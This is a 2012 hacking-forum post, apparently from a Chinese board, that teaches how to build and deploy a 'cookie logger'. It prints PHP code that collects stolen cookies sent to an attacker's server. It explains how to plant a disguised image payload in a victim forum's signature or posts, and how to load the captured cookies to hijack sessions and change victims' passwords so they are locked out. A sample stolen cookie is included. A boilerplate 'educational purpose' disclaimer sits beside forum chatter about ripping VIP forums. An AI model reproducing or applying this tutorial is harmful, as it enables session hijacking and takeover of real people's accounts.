[BlackHat] Cookie Logger

[复制链接]
查看: 195   回复: 0
发表于 2012-5-18 00:33:37 | 显示全部楼层 |阅读模式
本帖最后由 dxszzcylm 于 2012-5-18 00:35 编辑

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif
  1. http://www.duckload.com/download/6088918/script1.txt
复制代码
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php
  1. $filename = “logfile.txt”;if (isset($_GET["cookie"])){if (!$handle = fopen($filename, ‘a’)){echo “Temporary Server Error,Sorry for the inconvenience.”;exit;}else{if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE){echo “Temporary Server Error,Sorry for the inconvenience.”;exit;}}echo “Temporary Server Error,Sorry for the inconvenience.”;fclose($handle);exit;}echo “Temporary Server Error,Sorry for the inconvenience.”;exit;?>
复制代码
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
  1. cookielogger.php -> http://www.yoursite.com/cookielogger.php
  2. logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
  3. fun.gif -> http://www.yoursite.com/fun.gif
复制代码
Step 5: Go to the victim forum and insert this code in the signature or a post
  1. http://www.duckload.com/download/6089479/script2.txt
复制代码
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows
  1. phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%​3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
复制代码
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …

I ask supervip member here to help each other or if you have something to share please do share!. and who ever share stuff please give REPUTATION. One of my pending project too to keep this supervip section much more exciting and thrilling for everyone was there will also be a hidden section which will UNLOCK as soon as you reached a certain reputation. In this way GOOD reputable members will have to access hidden forum good for reputable members only but anyway for now this was just a plan as i have lot of vip forum to be ripped, and still on going. I leave you all now guys in peace. Thanks for reading!.
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则